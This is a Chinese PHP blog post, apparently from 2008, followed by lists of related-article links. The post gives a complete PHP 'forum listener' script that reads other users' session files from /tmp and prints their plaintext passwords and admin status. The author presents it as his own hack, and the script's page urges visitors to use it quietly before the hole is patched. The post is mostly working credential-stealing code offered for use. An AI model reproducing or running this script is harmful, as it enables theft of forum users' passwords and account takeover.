php查看session内容的函数


Posted in PHP onAugust 27, 2008

如:name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1",也知道该session存放的位置,而且可以上传文件,所以嘛,当时就做了一次小小的黑客,在线的朋友的密码可以一览无余,呵呵:
<?
function submit1(){
global $username;
print "<title>论坛监听器</title>";
$i=0;
if($username=="tasm"||$username=="Tasm")
{
print "你也太黑了吧?连我你也查?";
return;
}
$path="/tmp/";
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)=="sess"){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(";",$ary[0]);
$name= explode(":",$ary[0]);
if($name[2]=="\"".$username."\""){
$passwd= explode(":",$ary[1]);
$mode=explode(":",$ary[3]);
print "用户笔名:".$name[2]."<br>使用密码:".$passwd[2]."<br>使用模式:";
if($mode[1]==1)
print "<font color=red>管理员</font>";
else
print "一般用户";
print"<br><br>偷窃他人密码是不道德行为请少少为之<br>";
$i=1;
break;
}}}}
if(!$i)
print "用户:".$username."真的在线吗?如你确定,<a href='javascript:history.go(-1)'>请再来一次</a>,不要多打空格!";
$d->close();
}

function login(){
?>
<html>
<head>
<title>论坛监听器</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF">
<div align="center">
<p>论坛监听器 </p>
<p> </p>
<table width="500" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="2">当你看到一用户在线时你想看他的密码,你要如何作呢?</td>
</tr>
<tr>
<td colspan="2">让我来告诉你:就是使用本程序。</td>
</tr>
<tr>
<td colspan="2"><font color=red>郑重申明:本程序为自由程序,由它所造成的任何损失本人盖不负责。</font>
<br>不过这个问题也许很快就会被堵上,个位还是不要张扬的偷着用吧。</td>
</tr>
</table>
<form name="form1" method="post" action="<?print $PHP_SELF ?>" >
<p>请输入你要查的用户名:<br>
<input type="text" name="username">
</p>
<p>
<input type="submit" name="submit1" value="我同意以上申明,开始查找">
</p>
</form>
<p> </p>
</div>
</body>
</html>
<?
}
//--------------main()
if($submit1)
submit1();
else
login();
?>

PHP 相关文章推荐
桌面中心(三)修改数据库
Oct 09 PHP
全局记录程序片段的运行时间 正确找到程序逻辑耗时多的断点
Jan 06 PHP
无法载入 mcrypt 扩展,请检查 PHP 配置终极解决方案
Jul 18 PHP
php比较两个绝对时间的大小
Jan 31 PHP
PHP中ini_set和ini_get函数的用法小结
Feb 18 PHP
php求正负数数组中连续元素最大值示例
Apr 11 PHP
PHP获取指定月份第一天和最后一天的方法
Jul 18 PHP
php getcwd与dirname(__FILE__)区别详解
Sep 24 PHP
解决PHP 7编译安装错误:cannot stat ‘phar.phar’: No such file or directory
Feb 25 PHP
php获取微信共享收货地址的方法
Dec 21 PHP
PHP5.6读写excel表格文件操作示例
Feb 26 PHP
PHP通过文件保存和更新信息的方法分析
Sep 12 PHP
php 缓存函数代码
Aug 27 #PHP
php 中文处理函数集合
Aug 27 #PHP
常用的php对象类型判断
Aug 27 #PHP
phpMyAdmin2.11.6安装配置方法
Aug 24 #PHP
PHP6 先修班 JSON实例代码
Aug 23 #PHP
php的curl实现get和post的代码
Aug 23 #PHP
PHP Smarty生成EXCEL文档的代码
Aug 23 #PHP
You might like
深入Memcache的Session数据的多服务器共享详解
2013/06/13 PHP
PHP会话控制实例分析
2016/12/24 PHP
php使用PDO获取结果集的方法
2017/02/16 PHP
PHP实现数组和对象的相互转换操作示例
2019/03/20 PHP
使用tp框架和SQL语句查询数据表中的某字段包含某值
2019/10/18 PHP
基于PHP实现堆排序原理及实例详解
2020/06/19 PHP
js获取图片大小的函数代码
2011/09/20 Javascript
JavaScript中几个重要的属性(this、constructor、prototype)介绍
2013/05/19 Javascript
jQuery应用之jQuery链用法实例
2015/01/19 Javascript
JavaScript使用setTimeout实现延迟弹出警告框的方法
2015/04/07 Javascript
Jquery基础教程之DOM操作
2015/08/19 Javascript
JS+CSS实现类似QQ好友及黑名单效果的树型菜单
2015/09/22 Javascript
avalon js实现仿google plus图片多张拖动排序附源码下载
2015/09/24 Javascript
Vuejs开发环境搭建及热更新【推荐】
2018/09/07 Javascript
分享5个好用的javascript文件上传插件
2018/09/16 Javascript
JavaScript代码压缩工具UglifyJS和Google Closure Compiler的基本用法
2020/04/13 Javascript
keep-Alive搭配vue-router实现缓存页面效果的示例代码
2020/06/24 Javascript
探索浏览器页面关闭window.close()的使用详解
2020/08/21 Javascript
[02:32]“虐狗”镜头慎点 2016国际邀请赛中国区预选赛现场玩家采访
2016/06/28 DOTA
[01:06:26]全国守擂赛第二周 Team Coach vs DeMonsTer
2020/04/28 DOTA
python中 logging的使用详解
2017/10/25 Python
Python3简单实例计算同花的概率代码
2017/12/06 Python
用Python实现大文本文件切割的方法
2019/01/12 Python
Django Path转换器自定义及正则代码实例
2020/05/29 Python
Dune London官网:英国著名奢华鞋履品牌
2017/11/30 全球购物
英国的一家创新礼品和小工具零售商:Menkind
2019/08/24 全球购物
数控专业推荐信范文
2013/12/02 职场文书
跟单文员岗位职责
2014/01/03 职场文书
公司培训欢迎词
2014/01/10 职场文书
酒店保安领班职务说明书
2014/03/04 职场文书
教师考察材料范文
2014/06/03 职场文书
2014年维修电工工作总结
2014/11/20 职场文书
公司人力资源管理制度
2015/08/05 职场文书
导游词之鲁迅祖居
2019/10/17 职场文书
JS代码编译器Monaco使用方法
2021/06/11 Javascript
俄罗斯十大城市人口排名,第三首都仅排第六,第二是北方首都
2022/03/20 杂记